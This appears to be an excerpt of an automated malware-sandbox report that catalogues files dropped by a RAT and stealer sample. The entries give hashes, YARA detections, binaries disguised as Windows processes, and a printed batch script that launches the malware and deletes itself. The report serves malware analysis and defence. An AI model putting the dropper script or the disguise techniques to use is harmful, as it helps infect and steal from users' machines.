	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\BAOTDPUV.log	SearchIndexer.exe	Get hash	malicious	DCRat, Neshta, PureLog Stealer, zgRAT	Browse
	fatality.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	OneDriveStandaloneUpdater.exe	Get hash	malicious	DCRat	Browse
	85D5ktqjpd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	VIyu4dC9CU.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	top.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	DC86.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	WinPerfcommon.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Udzp7lL5ns.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	loader.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Include\0a62118e203df5

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	ASCII text, with very long lines (363), with no line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	5.828280279985632
Encrypted:	false
SSDEEP:	6:Gfyr8hUGk2ySh3YuUVyTphooLBZwGNYwQVK/hl1TNGTWhJVi40FS:Gf4wySpqc7IWDQVQ0u0FS
MD5:	E124D736399933B913803DA3E12E261D
SHA1:	E8D70EC6F7C38221ED61A5F5E2155766E4BFD4CF
SHA-256:	B45E49D32899D6CDC5B9D94A749681D4ED4D8AF740655B0C8F4116D3DE3DC701
SHA-512:	BEB9E44A4772C37B5FDCCB0DCC90556F91CFD5A563124AEDA30D1A7D7E7EA1EBFDC90766E11927F11032D4771D017872E2B6FF86E3073C25F58CBA480634A1E1
Malicious:	false
Preview:	KpEtYzEIhy7Y6NwDkX1DgrcUtS191rSzrMcQt02G4rBw4AQcY829Ku0cNu9F8EQzgIruufUtevIypqatCYl3ySo6W9D91wIzaMQvTgs3nJeZlBxgUQDjdWANeuYvbU2smSXdaoZfpsPpyOUUMgpktiWELCRjI7bSQwwTnTGp1h4vHVZPZDi4pS9E6TSXX0XsQ6YBbBq2aAtLok6zmBJEYhn8xsWUBtRAJLfK6XyXWqepjxaWWdvWqSUtTaOtpW1rssBcFw2ONvssC7Z9S97i75T01v0gJEsAzx60v7RjkgI5klqWBOapYTtxYKlT6WFIDr3PAiNVsY7bwYQPEdf4oCmfEJclV7mObA13sbVcBF7

C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2545152
Entropy (8bit):	7.696493390112077
Encrypted:	false
SSDEEP:	49152:gZP6vgp9kHCayPPLHCLXbX4pKXDys7yqmHji4Rn:goYp9kiHPbCfX4rsu3GQ
MD5:	B3F6318C958712D0C78B5A969EE2EFD1
SHA1:	ABF4CF8782F366A10DF36FF706AFEAFFD07DF514
SHA-256:	E2D2A557CF97F4D81A7D476D3FB5E43405F6E79FE266032DD3D8650D6B81D846
SHA-512:	67F987CA27548C3EF21E7C27990653E1443B0A761262EF2351BF1FD670903E7652E1A215A206B2FC197DBA33A661E762F410AB63B1605A2571C1872C75C78912
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y.g..................&...........&.. ....'...@.. .......................@'...........@...................................&.K.....'. .................... '...................................................... ............... ..H............text...4.&.. ....&................. ..`.rsrc... .....'.......&.............@....reloc....... '.......&.............@..B..................&.....H.......\|.......................V.&......................................0..........(.... ........8........E....)...N..........8$...(.... ....~f...{i...:....& ....8....(.... ....~f...{....9....& ....8....(.... ....~f...{....:....& ....8y......0..'....... ........8........E........M.......)...............8....8.... ....~f...{v...:....& ....8....8t... ....~f...{....:....& ....8....~....(S... .... .... ....s....~....(W....... ....8\...~....9B... ....8H...r...ps....z....~....(

C:\Program Files\Windows NT\69ddcba757bf72

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	ASCII text, with very long lines (668), with no line terminators
Category:	dropped
Size (bytes):	668
Entropy (8bit):	5.88110378628582
Encrypted:	false
SSDEEP:	12:WJT0lnd1opuMLC62uioI4DBQrxgywZ2Deqhjjr6lv2fBRj5k/eAdXc+:Wd0lnd1iuMLCmRDDyYqJjrJK/Jc+
MD5:	1EF14FBB32CCBD59EC1A2EDB74395156
SHA1:	5C8319E24C2888C3E927559AEA46FEE76FF03726
SHA-256:	00076FD18712FA7B1DDE34136D9391DE355DEF0D089BF374A0DA0687BF52BEBB
SHA-512:	B03877BEE270F4B648F56326805E983468ECF954B68E3FCECEDE960A5418BA21D72B005DBE05272C77C3486349E01D1F82E53E81AB961EC895014D66E5D1C5CD
Malicious:	false
Preview:	DQf9NDGlvTIpBsmgOPDFo4SB4r98wc1x7ecVquh63nHUrcySA5B68mAJ7eFfDHyScUrgQQzdsHMBw8Tb3r81b4yVdTYMpB2vyz1XuRCtGiO1a9W8KnmWI70hfWD72mxqPaM6G6qloPv3q74e6ZCCZfn18U1YOF0duim9wa1N6Ar3L71hbiBdjvQtxV7wFSXjYSIHV5rghzGZxtpBdT6pEX39R2LacFHnnIe3ytMg1e5uo15Ep6SvWrfBYJzcuQDcrcvpOwMtHayjbIUa6HufwWR5mdeo3twkbdDLFQz3tjo636kPzZfmfhpVLzCvRhzXoOI7FIUqS1wNrVCq3PzeOJE3ysAPNDmMtRRpymKqEzUovcn0xW2CsVIeJOJWIFcOOjdZDX1REJZZzZHWEJc1LkdXIxfjcxi9WFZL8NxZfl7i5tptHxR8mlDoFGQP2RyQkaCtA5X1WCWkm5bZHvcpgjWvCuF26hhNwq8fr6tMZamkPdBKo1IGzJuBERqPzf4zfJx576sLBPPF7vgjt5OFZaXn66aZPeW4gxEGpFNrJ7Fj3oDSvHg4RyZEvK9AgS5g3VjKrZ3nrg5cVxtR2IoI8cnrXAUfGNL1BiqiE3lVN2Nu27t8arHYnxiar1xqFYgdVEawGKN8gT4FP2yZRWEYFwNNAQ1N

C:\Program Files\Windows NT\smss.exe

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2545152
Entropy (8bit):	7.696493390112077
Encrypted:	false
SSDEEP:	49152:gZP6vgp9kHCayPPLHCLXbX4pKXDys7yqmHji4Rn:goYp9kiHPbCfX4rsu3GQ
MD5:	B3F6318C958712D0C78B5A969EE2EFD1
SHA1:	ABF4CF8782F366A10DF36FF706AFEAFFD07DF514
SHA-256:	E2D2A557CF97F4D81A7D476D3FB5E43405F6E79FE266032DD3D8650D6B81D846
SHA-512:	67F987CA27548C3EF21E7C27990653E1443B0A761262EF2351BF1FD670903E7652E1A215A206B2FC197DBA33A661E762F410AB63B1605A2571C1872C75C78912
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows NT\smss.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\smss.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y.g..................&...........&.. ....'...@.. .......................@'...........@...................................&.K.....'. .................... '...................................................... ............... ..H............text...4.&.. ....&................. ..`.rsrc... .....'.......&.............@....reloc....... '.......&.............@..B..................&.....H.......\|.......................V.&......................................0..........(.... ........8........E....)...N..........8$...(.... ....~f...{i...:....& ....8....(.... ....~f...{....9....& ....8....(.... ....~f...{....:....& ....8y......0..'....... ........8........E........M.......)...............8....8.... ....~f...{v...:....& ....8....8t... ....~f...{....:....& ....8....~....(S... .... .... ....s....~....(W....... ....8\...~....9B... ....8H...r...ps....z....~....(

C:\Program Files\Windows Sidebar\Gadgets\9e8d7a4ca61bd9

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.753055907333276
Encrypted:	false
SSDEEP:	3:++Wz0xUQuBcy:40xOqy
MD5:	50A840A00A24A4D2D3C1DD97E2B28A0A
SHA1:	F2A9733CFBE96DEC3B5F40AD86EB596567DFD89A
SHA-256:	85441B9CAE32F3D155E7C8CC75E2877EF2E2040FC5D48DF6E441D91D62AF8922
SHA-512:	89C25FC72A3061629DF1F43E7CEAAB1E9BBDEE15DB5DC4C9B44D96D28537B7F8F22D7FFA3A81B08872A3DFF734C8D88470C98835EAD39154D915A47DCFBC6EEA
Malicious:	false
Preview:	sez4ezs2LnxCVQEMJfhK3Lp1fim6ykQ59zil1ZMp

C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2545152
Entropy (8bit):	7.696493390112077
Encrypted:	false
SSDEEP:	49152:gZP6vgp9kHCayPPLHCLXbX4pKXDys7yqmHji4Rn:goYp9kiHPbCfX4rsu3GQ
MD5:	B3F6318C958712D0C78B5A969EE2EFD1
SHA1:	ABF4CF8782F366A10DF36FF706AFEAFFD07DF514
SHA-256:	E2D2A557CF97F4D81A7D476D3FB5E43405F6E79FE266032DD3D8650D6B81D846
SHA-512:	67F987CA27548C3EF21E7C27990653E1443B0A761262EF2351BF1FD670903E7652E1A215A206B2FC197DBA33A661E762F410AB63B1605A2571C1872C75C78912
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y.g..................&...........&.. ....'...@.. .......................@'...........@...................................&.K.....'. .................... '...................................................... ............... ..H............text...4.&.. ....&................. ..`.rsrc... .....'.......&.............@....reloc....... '.......&.............@..B..................&.....H.......\|.......................V.&......................................0..........(.... ........8........E....)...N..........8$...(.... ....~f...{i...:....& ....8....(.... ....~f...{....9....& ....8....(.... ....~f...{....:....& ....8y......0..'....... ........8........E........M.......)...............8....8.... ....~f...{v...:....& ....8....8t... ....~f...{....:....& ....8....~....(S... .... .... ....s....~....(W....... ....8\...~....9B... ....8H...r...ps....z....~....(

C:\Program Files\WindowsPowerShell\0a62118e203df5

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	ASCII text, with very long lines (913), with no line terminators
Category:	dropped
Size (bytes):	913
Entropy (8bit):	5.883258522334689
Encrypted:	false
SSDEEP:	24:fxhVhaElB688Ru3rc8YnwuUvKtG617dYA3cDc3/Urm:PT8mNTuUvKth7qcvUrm
MD5:	1513D173E3BB43D7D3705C1BDFA219C4
SHA1:	AE833A14451C4D044ACC71991A2BB646434134F1
SHA-256:	F968BA6CD6699BDF47829921BB9AC27FF4A7798BC7655794F439C81FC90D7073
SHA-512:	68B8EF6C05E94B048F5D3DCEA4F61A37D697B04647027F504001FF47605B7E0D19AF98655FD2BEAB9ED08A8447C27E69BAB3F50623D5CA5295F7AFE309D19EBB
Malicious:	false
Preview:	WOd1KeBEXK1Fm9uvt9vgWgmHC3iFmKwIdq9tJXRg0yVReXYGMOlSPdhzlVyR55cMYsm59BlWsPpiLVmoeb2Xid29IJHyi9k5VI2vudGKnPk9x9oPsJweCEn50mw04wxspuMCd04AVsuT23MIf1GYMG2Qe65IqQQ0b2UCxmw1PvIUUUC6ZoUCqZfj25hg5vUEc31AjJV3FOIa7h6K48sC5NKCWuK2EP6ebD2bcBXQSb7bQEmU9Wm6DSJPtzoy9cyzSo93per2lctePsvSIz2rnAaI4nsnXiRznHJlEspeptUljo9ADWqJkGMRO08CwEfCK30HiKNZKYC3pzjQnrjB2HPh52XNumrlOSaqy1c3IQ9LDSmYRsYFeeJDnTMqw9phqbpXZ3cwPp2lHEdnP96BOmGuIWCepvHJlcfmmO9YQm0zli5jziaxCnTDV5PC07HdisApi1BB9ivmwQIkbdpGVTG8JbQq96hTeWQ2hQA7hZxe1qRExolWRAIOlCgHkUBCAcHZ9PCLdrj5gmGcJM3VVLBdOCQft2WMXudZj1Ehla2jbMs96D7YaqrzanL78hblUXivJq3SIWt5SbCBTRiq48vrDo85qGiE8RPEo60PKpPE7vh9lJnq8vqVl1rfs8lBxp6AM8WXbTfPtqtRG9Tgc1FNl3cxOVhMENRSygwnxQPpPbm4HaYsoFi5jsZTfjIGwTLfZbcjMqtMma8KQiqy6yh8pVsGHdIOIJ35QHeq7yg8VWTJuPC62TJ7wM0EsWcthfDchC4JD91IRimSBjV2aLVz95JDQa7kWxa0T0mrV332bBqNjiCJBjSWJOdl302mCRveHv9L6ohhRcY8P5esXyjweEqFXAxeAQ0JPLFxj1MWCuEr0eW8WKPOs99DE3x60ChBlOtDzqJglMuu9

C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2545152
Entropy (8bit):	7.696493390112077
Encrypted:	false
SSDEEP:	49152:gZP6vgp9kHCayPPLHCLXbX4pKXDys7yqmHji4Rn:goYp9kiHPbCfX4rsu3GQ
MD5:	B3F6318C958712D0C78B5A969EE2EFD1
SHA1:	ABF4CF8782F366A10DF36FF706AFEAFFD07DF514
SHA-256:	E2D2A557CF97F4D81A7D476D3FB5E43405F6E79FE266032DD3D8650D6B81D846
SHA-512:	67F987CA27548C3EF21E7C27990653E1443B0A761262EF2351BF1FD670903E7652E1A215A206B2FC197DBA33A661E762F410AB63B1605A2571C1872C75C78912
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y.g..................&...........&.. ....'...@.. .......................@'...........@...................................&.K.....'. .................... '...................................................... ............... ..H............text...4.&.. ....&................. ..`.rsrc... .....'.......&.............@....reloc....... '.......&.............@..B..................&.....H.......\|.......................V.&......................................0..........(.... ........8........E....)...N..........8$...(.... ....~f...{i...:....& ....8....(.... ....~f...{....9....& ....8....(.... ....~f...{....:....& ....8y......0..'....... ........8........E........M.......)...............8....8.... ....~f...{v...:....& ....8....8t... ....~f...{....:....& ....8....~....(S... .... .... ....s....~....(W....... ....8\...~....9B... ....8H...r...ps....z....~....(

C:\Recovery\0a62118e203df5

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	ASCII text, with very long lines (470), with no line terminators
Category:	dropped
Size (bytes):	470
Entropy (8bit):	5.902133483460021
Encrypted:	false
SSDEEP:	12:hwpTAcgFCixWnNfzEblBOlyvegD7S8vBt4:hiTApuaJBOlqesTt4
MD5:	3C6E586AAEB8A46CF6DB337719AA6E87
SHA1:	1C947D9B701DA184DBB057921BA745308ACEA68B
SHA-256:	11CDF68A8460907A7B13746F4821522DB2DEA62D1F2356AF561449E87F8E1A91
SHA-512:	294E83F99D7E95245B8114157E0FC8979912F9C3E6349CCC79A5CCAFC24A1CDD6CC13BA1A89F6C582AB1B3AE2901C7D9C0F62E2F46CF55E8661021D42B82FCDB
Malicious:	false
Preview:	YWXjE37DSXH4Y5PhtwKTOtas10RfR9L0a4HDHOwYrrGobCTXlhdyqCOo6osNlcvTMQeeyLaeAvlgmvRyh43tfXKYpcHcgiwP6wcKiyiaH9x4asBKX3qriByyGGyWE88c9Wj0SGQsWdmgjP76a6Em1Fq58nEcAMVIBV5EIL2Rn7VFYSP0I25I3Vk4po1oBxsKHdfOU2xOEx93tkgqYOTIQMPpuAZeUNPzPL84xAfQErEFVqKEIKQxdk34OzeUdT41iKoiml3XsDDiIJUDzUWJ6bVoRDq7gLwuxNhLCmcgR2FagUwEfaeJ7u4Hy9Rj551hQTv5mIAN1z2EW5I6QlcFrnxCSZXDV2kVBhJNj1cWaQRH10u30USUdv0nftmMv729OhCyv5XZJFpaVqKcodMAkQ1PrfrzPPlcXS2Ux6H573LXGZRziJhRv2Z8pxGQNhJ3eMCDx0psWQCqFeJSN1RFrU

C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2545152
Entropy (8bit):	7.696493390112077
Encrypted:	false
SSDEEP:	49152:gZP6vgp9kHCayPPLHCLXbX4pKXDys7yqmHji4Rn:goYp9kiHPbCfX4rsu3GQ
MD5:	B3F6318C958712D0C78B5A969EE2EFD1
SHA1:	ABF4CF8782F366A10DF36FF706AFEAFFD07DF514
SHA-256:	E2D2A557CF97F4D81A7D476D3FB5E43405F6E79FE266032DD3D8650D6B81D846
SHA-512:	67F987CA27548C3EF21E7C27990653E1443B0A761262EF2351BF1FD670903E7652E1A215A206B2FC197DBA33A661E762F410AB63B1605A2571C1872C75C78912
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y.g..................&...........&.. ....'...@.. .......................@'...........@...................................&.K.....'. .................... '...................................................... ............... ..H............text...4.&.. ....&................. ..`.rsrc... .....'.......&.............@....reloc....... '.......&.............@..B..................&.....H.......\|.......................V.&......................................0..........(.... ........8........E....)...N..........8$...(.... ....~f...{i...:....& ....8....(.... ....~f...{....9....& ....8....(.... ....~f...{....:....& ....8y......0..'....... ........8........E........M.......)...............8....8.... ....~f...{v...:....& ....8....8t... ....~f...{....:....& ....8....~....(S... .... .... ....s....~....(W....... ....8\...~....9B... ....8H...r...ps....z....~....(

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BlockcontainerWin.exe.log

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HK1HmHKlT4vHNpv:iqbYqGSI6oPtzHeqKkt1wmj0q1GqZ4vb
MD5:	63FDE44070DCD58C798C851711274955
SHA1:	70F292AEC1D905E7B3875B457EFB6AB59666A9EE
SHA-256:	11FE986688725A8BDA34D763C6BE6DBF4957CA1710603D111FBDFE7D7CB10DEE
SHA-512:	E9DCC7BDB7895982206E6E3733D13B99E6B66F148AE44AF268AEF16BDBC752E05FDFD01F489EC7419403BB985E66A55A14A34523AE8DCE8B1077432524941DA5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GKcQVcpwHdHgqKNzncXgLOYQsT.exe.log

Download File

Process:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HK1HpHNpaHKlT4x:iqbYqGSI6oPtzHeqKkt1wmj0q1Jtpaq2
MD5:	317B013632C78C70B439470DFC84CFE4
SHA1:	0AC83F2F5A1025F6AB3E4AB0DABB7A6F4373352B
SHA-256:	AD44D0FAB7070B38C2C837DD47621A930B565F561217807E45D5AD57FFE1BF5D
SHA-512:	AEC05184A65564407C24BFFB744F0629520AA8B233EAA10581AD501CDC74872A7564473402F74088E29786463785E252E0A9A42123FD63763620884CEE7336AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\smss.exe.log

Download File

Process:	C:\Program Files\Windows NT\smss.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HK1HpHNpaHKlT4x:iqbYqGSI6oPtzHeqKkt1wmj0q1Jtpaq2
MD5:	317B013632C78C70B439470DFC84CFE4
SHA1:	0AC83F2F5A1025F6AB3E4AB0DABB7A6F4373352B
SHA-256:	AD44D0FAB7070B38C2C837DD47621A930B565F561217807E45D5AD57FFE1BF5D
SHA-512:	AEC05184A65564407C24BFFB744F0629520AA8B233EAA10581AD501CDC74872A7564473402F74088E29786463785E252E0A9A42123FD63763620884CEE7336AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllullkv/tz:NllU+v/
MD5:	6442F277E58B3984BA5EEE0C15C0C6AD
SHA1:	5343ADC2E7F102EC8FB6A101508730898CB14F57
SHA-256:	36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
SHA-512:	F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\4PyWtYxh61

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:563r/RxtbCcJ:Qb/RJ
MD5:	8AC0414C8ACB504015031C60509A105A
SHA1:	DF740186D008BD87FD87B10E12CD4F29E85E29A0
SHA-256:	C47D32073B9B1586435155829BF88BE5637C8A5058133539B92B655074A18F59
SHA-512:	0204E104FC5613EDC665F2913C76ADC0F2A52C4BAF5E56461707078520D8545AAAAE6355E20D32DB519215C4A66D55717CB857748BE129CC3C26C1313745CA1C
Malicious:	false
Preview:	QeI1U3cLzDXZtTHXi1Nw0T92l

C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	163
Entropy (8bit):	5.118166158701211
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mbZjgL8D/PRJIvBktKcKZG1qLTVSRE2J5xAIqxG:hCRLuVFOOr+DEi4/ZmvKOZG1qLTwi23V
MD5:	56CBCCAE9958E77FC0C329F1CCA4B531
SHA1:	F196C70B26D9ED9F7D9B86E0025C6D42E3979A5B
SHA-256:	36DE5CCDAE3B6BC2F76ADC68525665599DB74ECE6C402C386741ADD61D1AC1B3
SHA-512:	1D4F54CB6CF9E6270F189B9FDC3FD0689034A8D947F22EF31078BFAE3DBBA09944AB5946DB21AB37154F00F82B534F7798056DB7ABEF890420BB7A410EE6B90B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Windows NT\smss.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\DFtfeA2Uey.bat"

C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat

Download File

Process:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	169
Entropy (8bit):	5.402518653595053
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m7SqEhHg/LVovBktKcKZG1qLTVSRE2J5xAI7R:hCRLuVFOOr+DE7jAAOvKOZG1qLTwi231
MD5:	F4FCE0154E78C289FE55B9A6307152A8
SHA1:	F8138EA44299193B659827010B847297F5960421
SHA-256:	CCFBEE1F11B8330789D52F1D923AE70EDA3A1038F62131BCBF4C99B6D624EBBE
